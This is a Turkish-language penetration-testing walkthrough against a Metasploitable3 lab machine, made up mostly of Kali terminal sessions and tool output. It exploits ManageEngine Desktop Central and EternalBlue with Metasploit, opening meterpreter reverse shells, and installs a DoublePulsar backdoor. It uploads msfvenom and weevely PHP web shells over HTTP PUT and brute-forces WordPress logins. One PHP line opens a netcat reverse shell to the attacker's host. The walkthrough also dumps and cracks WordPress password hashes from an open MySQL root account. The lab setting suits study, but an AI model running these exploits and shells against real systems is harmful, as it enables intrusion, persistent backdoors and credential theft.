ManageEngine Desktop Central 9
root@kali:~# nmap 192.168.119.108 -sV -A -v
Tarama sonuçlarında Metasploitable3 makinesinde 8020 ve 8383 portlarınn Apache Httpd üzerinde çalıştığını görüyoruz.
Öyleyse hemen bu portları da kullanarak browser üzerinden erişebileceğimiz birşey var mı bakalım. (Neydi Enumeration is the key )
O da nesi. ManageEngine Desktop Central Login arayüzüne erişim sağladık. Sayfanın bize sağladığı bilgilerden yola çıkarak elde edebileceklerimizi araştırmaya başlayalım.
msf5 > search manageengine
Yukarıdaki komutu çalıştırdığımızda Manage Engine Desktop Central 9 için yayımlanmış bir exploit olduğunu görüyoruz. (Burada arama sonucunda birşey elde edemeseydik tespit edilen bir zafiyet olup olmadığını google’a soracaktık.)
24 exploit/windows/http/manageengine_connectionid_write 2015-12-14 excellent Yes ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability
msf5 > use exploit/windows/http/manageengine_connectionid_write
msf5 exploit(windows/http/manageengine_connectionid_write) > show options
Module options (exploit/windows/http/manageengine_connectionid_write):
Name Current Setting Required Description
—- ————— ——– ———–
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 8020 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for ManageEngine Desktop Central
VHOST no HTTP server virtual host
Exploit target:
Id Name
— —-
0 ManageEngine Desktop Central 9 on Windows
msf5 exploit(windows/http/manageengine_connectionid_write) > set RHOSTS 192.168.119.108
RHOSTS => 192.168.119.108
msf5 exploit(windows/http/manageengine_connectionid_write) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/manageengine_connectionid_write) > set lhost 192.168.119.107
lhost => 192.168.119.107
msf5 exploit(windows/http/manageengine_connectionid_write) > show options
Module options (exploit/windows/http/manageengine_connectionid_write):
Name Current Setting Required Description
—- ————— ——– ———–
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOSTS 192.168.119.108 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 8020 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for ManageEngine Desktop Central
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)
LHOST 192.168.119.107 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
— —-
0 ManageEngine Desktop Central 9 on Windows
msf5 exploit(windows/http/manageengine_connectionid_write) >
msf5 exploit(windows/http/manageengine_connectionid_write) > exploit
[*] Started reverse TCP handler on 192.168.119.107:4444
[*] Creating JSP stager
[*] Uploading JSP stager DmMoU.jsp…
[*] Executing stager…
[*] Sending stage (180291 bytes) to 192.168.119.108
[*] Meterpreter session 1 opened (192.168.119.107:4444 -> 192.168.119.108:49340) at 2019-11-11 14:52:41 -0500
[!] This exploit may require manual cleanup of ‘../webapps/DesktopCentral/jspf/DmMoU.jsp’ on the target
meterpreter >
[+] Deleted ../webapps/DesktopCentral/jspf/DmMoU.jsp
whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
SMB – EternalBlue Zafiyeti Metasploit Console Üzerinden Ele Geçirme
msf5 > search eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
– —- ————— —- —– ———–
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization
3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
— —-
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.119.108
RHOSTS => 192.168.119.108
msf5 exploit(windows/smb/ms17_010_eternalblue) >
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.119.107
lhost => 192.168.119.107
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
Eternal Blue zafiyetini sömürmek istediğimizde en can sıkıcı durumlardan bir tanesi kurban makinesinin mavi ekran vermesidir. Bu durumda birkaç deneme yapmamız gerekebiliyor.
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.119.107:4444
[+] 192.168.119.108:445 – Host is likely VULNERABLE to MS17-010! – Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.119.108:445 – Connecting to target for exploitation.
[+] 192.168.119.108:445 – Connection established for exploitation.
[+] 192.168.119.108:445 – Target OS selected valid for OS indicated by SMB reply
[*] 192.168.119.108:445 – CORE raw buffer dump (51 bytes)
[*] 192.168.119.108:445 – 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.119.108:445 – 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.119.108:445 – 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
[*] 192.168.119.108:445 – 0x00000030 6b 20 31 k 1
[+] 192.168.119.108:445 – Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.119.108:445 – Trying exploit with 12 Groom Allocations.
[*] 192.168.119.108:445 – Sending all but last fragment of exploit packet
[*] 192.168.119.108:445 – Starting non-paged pool grooming
[+] 192.168.119.108:445 – Sending SMBv2 buffers
[+] 192.168.119.108:445 – Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.119.108:445 – Sending final SMBv2 buffers.
[*] 192.168.119.108:445 – Sending last fragment of exploit packet!
[*] 192.168.119.108:445 – Receiving response from exploit packet
[+] 192.168.119.108:445 – ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.119.108:445 – Sending egg to corrupted connection.
[*] 192.168.119.108:445 – Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.119.108
[*] Meterpreter session 2 opened (192.168.119.107:4444 -> 192.168.119.108:49292) at 2019-11-11 15:10:05 -0500
[+] 192.168.119.108:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.108:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.119.108:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > dir
Listing: C:\Windows\system32
============================
EternalBlue Manuel Metodlar
root@kali:~/eternalblue# git clone https://github.com/interference-security/Eternalblue-Doublepulsar.git
Cloning into ‘Eternalblue-Doublepulsar’…
remote: Enumerating objects: 67, done.
remote: Total 67 (delta 0), reused 0 (delta 0), pack-reused 67
Unpacking objects: 100% (67/67), done.
root@kali:~/eternalblue# cd Eternalblue-Doublepulsar/
root@kali:~/eternalblue/Eternalblue-Doublepulsar# ls -l
total 48
drwxr-xr-x 2 root root 4096 Nov 14 07:48 deps
-rwxr-xr-x 1 root root 5222 Nov 14 07:48 eternalblue_doublepulsar.rb
-rw-r–r– 1 root root 1965 Nov 14 07:48 eternalblue-exploit.sh
-rw-r–r– 1 root root 26461 Nov 14 07:48 LICENSE
-rw-r–r– 1 root root 900 Nov 14 07:48 README.md
root@kali:~/eternalblue/Eternalblue-Doublepulsar# chmod +x eternalblue-exploit.sh
root@kali:~/eternalblue/Eternalblue-Doublepulsar# ./eternalblue-exploit.sh 192.168.119.108 445 60 WIN72K8R2 x64 lsass.exe adfw.dll
[*] Started: Thu 14 Nov 2019 08:23:49 AM EST
[*] Creating EternalBlue XML template
[*] Setting values in EternalBlue XML file
[*] Creating DoublePulsar XML template
[*] Setting values in DoublePulsar XML file
[*] Executing EternalBlue
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor…
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (52 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
0x00000030 6b 20 31 00 k 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
…………….DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
………….DONE.
[+] Sending large SMBv1 buffer..DONE.
[+] Sending final SMBv2 buffers……DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor…
[+] Backdoor returned code: 10 – Success!
[+] Ping returned Target architecture: x64 (64-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
HTTP Put Metodu
root@kali:~# nmap -script http-methods -script-args http-methods.url-path=’/uploads’,http-methods.test-all -p 8585 192.168.119.108
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 15:11 EST
Nmap scan report for 192.168.119.108
Host is up (0.00031s latency).
PORT STATE SERVICE
8585/tcp open unknown
MAC Address: 08:00:27:36:17:67 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds
root@kali:~# Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-09 07:02 EST
Nikto
root@kali:~# nikto -host http://192.168.119.108:8585/uploads
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.119.108
+ Target Hostname: 192.168.119.108
+ Target Port: 8585
+ Start Time: 2019-11-11 15:13:13 (GMT-5)
—————————————————————————
+ Server: Apache/2.2.21 (Win64) PHP/5.3.10 DAV/2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /uploads/: Directory indexing found.
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ PHP/5.3.10 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /uploads/nikto-test-o7fmDVla.html, inode: W/1000000000b37a, size: 16, mtime: 59717c30c7ddd
+ OSVDB-397: HTTP method ‘PUT’ allows clients to save files on the web server.
+ Retrieved dav header: 1,2
+ Retrieved ms-author-via header: DAV
+ Uncommon header ‘ms-author-via’ found, with contents: DAV
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST, DELETE, TRACE, PROPFIND, PROPPATCH, COPY, MOVE, LOCK, UNLOCK
+ OSVDB-5646: HTTP method (‘Allow’ Header): ‘DELETE’ may allow clients to remove files on the web server.
+ OSVDB-5647: HTTP method (‘Allow’ Header): ‘MOVE’ may allow clients to change file locations on the web server.
+ WebDAV enabled (PROPPATCH COPY PROPFIND LOCK UNLOCK listed as allowed)
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /uploads/./: Directory indexing found.
+ /uploads/./: Appending ‘/./’ to a directory allows indexing
+ OSVDB-3268: /uploads//: Directory indexing found.
+ /uploads//: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
+ OSVDB-3268: /uploads/%2e/: Directory indexing found.
+ OSVDB-576: /uploads/%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.com/bid/2513.
OSVDB-3268: /uploads///: Directory indexing found.
+ OSVDB-119: /uploads/?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via ‘open directory browsing’. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-119: /uploads/?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via ‘open directory browsing’. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-3268: /uploads///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory indexing found.
+ OSVDB-3288: /uploads///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03 reveals directory listing when /’s are requested.
Nmap HTTP PUT Meterpreter shell
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.119.107 lport=4444 -f raw > /root/ce-shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1116 bytes
root@kali:~#
root@kali:~# vim ce-shell.php
PHP dosyasının en başındaki /* kısmını siliyoruz.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > set lhost 192.168.119.107
lhost => 192.168.119.107
msf5 exploit(multi/handler) >
oot@kali:~# nmap -sV -script http-put -script-args http-put.url=’/uploads/ce-shell.php’,http-put.file=’/root/ce-shell.php’ -p 8585 192.168.119.108
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 15:19 EST
Nmap scan report for 192.168.119.108
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
8585/tcp open http Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
|_http-put: ERROR: Failed to open file: \xE2\x80\x99/root/ce-shell.php\xE2\x80\x99
|_http-server-header: Apache/2.2.21 (Win64) PHP/5.3.10 DAV/2
MAC Address: 08:00:27:36:17:67 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.75 seconds
root@kali:~# root@kali:~#
msf5 > use auxiliary/scanner/http/http_put
msf5 auxiliary(scanner/http/http_put) > set rhosts 192.168.119.108
rhosts => 192.168.119.108
msf5 auxiliary(scanner/http/http_put) > set path /uploads
path => /uploads
msf5 auxiliary(scanner/http/http_put) > set filename ce-shell.php
filename => ce-shell.php
msf5 auxiliary(scanner/http/http_put) > set filedata file://root/ce-shell.php
msf5 auxiliary(scanner/http/http_put) > set rport 8585
rport => 8585
msf5 auxiliary(scanner/http/http_put) > exploit
http://192.168.119.108:8585/uploads/ce-shell.php
Boooom.
Metasploitable 3 WordPress Sitesini Ele Geçirme
root@kali:~# wpscan –url http://192.168.119.108:8585/wordpress/
______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.3
WPScan.io – Online WordPress Vulnerability Scanner
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N][+] URL: http://192.168.119.108:8585/wordpress/
[+] Started: Mon Nov 11 15:33:02 2019
Interesting Finding(s):
[+] http://192.168.119.108:8585/wordpress/
| Interesting Entries:
| – Server: Apache/2.2.21 (Win64) PHP/5.3.10 DAV/2
| – X-Powered-By: PHP/5.3.10
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.119.108:8585/wordpress/xmlrpc.php
| Found By: Link Tag (Passive Detection)
| Confidence: 100%
| Confirmed By: Direct Access (Aggressive Detection), 100% confidence
| References:
| – http://codex.wordpress.org/XML-RPC_Pingback_API
| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| – https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.119.108:8585/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.119.108:8585/wordpress/wp-includes/rss-functions.php
| Interesting Entry: C:\wamp\www\wordpress\wp-includes\rss-functions.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| Reference: https://www.owasp.org/index.php/Full_Path_Disclosure
[+] Upload directory has listing enabled: http://192.168.119.108:8585/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.119.108:8585/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| – https://www.iplocation.net/defend-wordpress-from-ddos
| – https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.6.1 identified (Insecure, released on 2016-09-07).
| Detected By: Rss Generator (Passive Detection)
| – http://192.168.119.108:8585/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=4.6.1</generator>
| – http://192.168.119.108:8585/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.6.1</generator>
[+] WordPress theme in use: twentyfourteen
| Location: http://192.168.119.108:8585/wordpress/wp-content/themes/twentyfourteen/
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://192.168.119.108:8585/wordpress/wp-content/themes/twentyfourteen/readme.txt
| [!] The version is out of date, the latest version is 2.7
| Style URL: http://192.168.119.108:8585/wordpress/wp-content/themes/twentyfourteen/style.css?ver=4.6.1
| Style Name: Twenty Fourteen
| Style URI: https://wordpress.org/themes/twentyfourteen/
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design…
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.8 (80% confidence)
| Detected By: Style (Passive Detection)
| – http://192.168.119.108:8585/wordpress/wp-content/themes/twentyfourteen/style.css?ver=4.6.1, Match: ‘Version: 1.8’
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups – Time: 00:00:00 <======================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.
[+] Finished: Mon Nov 11 15:33:25 2019
[+] Requests Done: 49
[+] Cached Requests: 5
[+] Data Sent: 16.31 KB
[+] Data Received: 200.305 KB
[+] Memory used: 182.352 MB
[+] Elapsed time: 00:00:23
root@kali:~#
msf5 auxiliary> use auxiliary/scanner/http/wordpress_login_enum
msf5 auxiliary(scanner/http/wordpress_login_enum) > show options
Module options (auxiliary/scanner/http/wordpress_login_enum):
Name Current Setting Required Description
—- ————— ——– ———–
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE true yes Perform brute force authentication
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
ENUMERATE_USERNAMES true yes Enumerate usernames
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RANGE_END 10 no Last user id to enumerate
RANGE_START 1 no First user id to enumerate
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI / yes The base path to the wordpress application
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VALIDATE_USERS true yes Validate usernames
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/http/wordpress_login_enum) > set bruteforce_speed 100
bruteforce_speed => 100
msf5 auxiliary(scanner/http/wordpress_login_enum) > set pass_file /root/parola.txt
pass_file => /root/parola.txt
msf5 auxiliary(scanner/http/wordpress_login_enum) > set user_file /root/users.txt
user_file => /root/users.txt
msf5 auxiliary(scanner/http/wordpress_login_enum) > set RHOSTS 192.168.119.108
RHOSTS => 192.168.119.108
msf5 auxiliary(scanner/http/wordpress_login_enum) > set rport 8585
rport => 8585
msf5 auxiliary(scanner/http/wordpress_login_enum) > set targeturi /wordpress
targeturi => /wordpress/
msf5 auxiliary(scanner/http/wordpress_login_enum) > run
Brute Force başlasın. Güç bizimle olsun
Ve login olabileceğimiz bir kullanıcı bilgisi elde ettik gibi görünüyor.
Boooom,içerdeyiz.
<?php echo shell_exec(“nc.exe 192.168.119.107 4444 -e cmd.exe”); ?>
root@kali:~# nc -nvlp 4444
listening on [any] 4444 …
connect to [192.168.119.107] from (UNKNOWN) [192.168.119.108] 49551
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\wamp\www\wordpress>dir
dir
Volume in drive C is Windows 2008R2
Volume Serial Number is B421-16B4
Directory of C:\wamp\www\wordpress
09/26/2016 02:28 PM 255 .htaccess
09/24/2013 04:18 PM 418 index.php
03/05/2016 12:14 PM 19,935 license.txt
07/26/2018 04:55 AM 59,392 nc.exe
08/16/2016 12:39 PM 7,344 readme.html
05/24/2016 01:02 PM 5,456 wp-activate.php
09/07/2016 06:58 AM <DIR> wp-admin
12/19/2015 03:20 AM 364 wp-blog-header.php
05/23/2016 08:44 AM 1,477 wp-comments-post.php
12/16/2015 01:58 AM 2,853 wp-config-sample.php
09/26/2016 02:27 PM 3,118 wp-config.php
11/11/2019 01:27 PM <DIR> wp-content
05/24/2015 09:26 AM 3,286 wp-cron.php
09/07/2016 06:58 AM <DIR> wp-includes
05/23/2016 08:44 AM 2,382 wp-links-opml.php
04/14/2016 09:53 AM 3,353 wp-load.php
06/14/2016 01:51 PM 34,057 wp-login.php
07/13/2016 04:37 AM 7,786 wp-mail.php
08/13/2016 08:02 AM 13,920 wp-settings.php
05/24/2016 12:44 PM 29,890 wp-signup.php
11/30/2014 01:23 PM 4,035 wp-trackback.php
07/06/2016 04:40 AM 3,064 xmlrpc.php
19 File(s) 202,385 bytes
3 Dir(s) 47,074,127,872 bytes free
C:\wamp\www\wordpress>cd c:\
cd c:\
c:\>dir
dir
Volume in drive C is Windows 2008R2
Volume Serial Number is B421-16B4
Directory of c:\
07/16/2018 12:27 PM <DIR> glassfish
07/16/2018 12:45 PM 0 jack_of_diamonds.png
07/16/2018 12:43 PM 103 java0.log
07/16/2018 12:43 PM 103 java1.log
07/16/2018 12:43 PM 103 java2.log
07/16/2018 12:42 PM <DIR> ManageEngine
07/16/2018 12:30 PM <DIR> openjdk6
07/13/2009 07:20 PM <DIR> PerfLogs
07/16/2018 12:44 PM <DIR> Program Files
07/16/2018 12:42 PM <DIR> Program Files (x86)
07/16/2018 12:31 PM <DIR> RubyDevKit
07/25/2018 04:25 AM <DIR> tmp
07/16/2018 12:30 PM <DIR> tools
07/17/2018 01:03 PM <DIR> Users
07/16/2018 02:11 PM <SYMLINKD> vagrant [\\vboxsvr\vagrant]
07/17/2018 11:02 AM <DIR> wamp
11/11/2019 11:59 AM <DIR> Windows
10/07/2015 05:22 PM 226 __Argon__.tmp
5 File(s) 535 bytes
13 Dir(s) 47,074,127,872 bytes free
c:\>
Cadaver ile Put metodunu Kullanarak Zafiyet Sömürme
root@kali:~# nano ce_shell.php
root@kali:~# cadaver http://192.168.119.108:8585/uploads/
dav:/uploads/> put ce_shell.php
Uploading ce_shell.php to `/uploads/ce_shell.php’:
Progress: [=============================>] 100.0% of 1115 bytes succeeded.
dav:/uploads/>
http://192.168.119.108:8585/uploads/
root@kali:~# curl http://192.168.119.108:8585/uploads/ce_shell.php?e=ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::f430:5058:4e6f:2a95%11
IPv4 Address. . . . . . . . . . . : 192.168.119.108
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Tunnel adapter isatap.{F770E00C-2DAF-4DA9-8098-4AF2DFB8E7A5}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
root@kali:~#
root@kali:~# weevely generate basitparola /root/Desktop/vebasit.php
Generated ‘/root/Desktop/vebasit.php’ with password ‘basitparola’ of 779 byte size.
root@kali:~#
root@kali:~# weevely http://192.168.119.108:8585/uploads/vebasit.php basitparola
[+] weevely 3.7.0
[+] Target: 192.168.119.108:8585
[+] Session: /root/.weevely/sessions/192.168.119.108/vebasit_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely>
Metasploitable 3 Mysql Zafiyeti
root@kali:~# mysql -u root -h 192.168.119.108
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 216
Server version: 5.5.20-log MySQL Community Server (GPL)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.
MySQL [(none)]> show databases;
+——————–+
| Database |
+——————–+
| information_schema |
| cards |
| mysql |
| performance_schema |
| test |
| wordpress |
+——————–+
6 rows in set (0.005 sec)
MySQL [(none)]> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [wordpress]> select user_login, user_pass from wp_users;
+————+————————————+
| user_login | user_pass |
+————+————————————+
| admin | $P$B2PFjjNJHOQwDzqrQxfX4GYzasKQoN0 |
| vagrant | $P$BMO//62Hj1IFeIr0XuJUqMmtBllnzN/ |
| user | $P$B83ijKvzkiB6yZL8Ubpi35CMQHiQjv/ |
| manager | $P$BvcrF0Y02JqJRkbXMREj/CBvP..21s1 |
+————+————————————+
4 rows in set (0.001 sec)
MySQL [wordpress]>
root@kali:~# nano wordpresshash.txt
root@kali:~# john wordpresshash.txt –show
admin:sploit
1 password hashes cracked, 0 left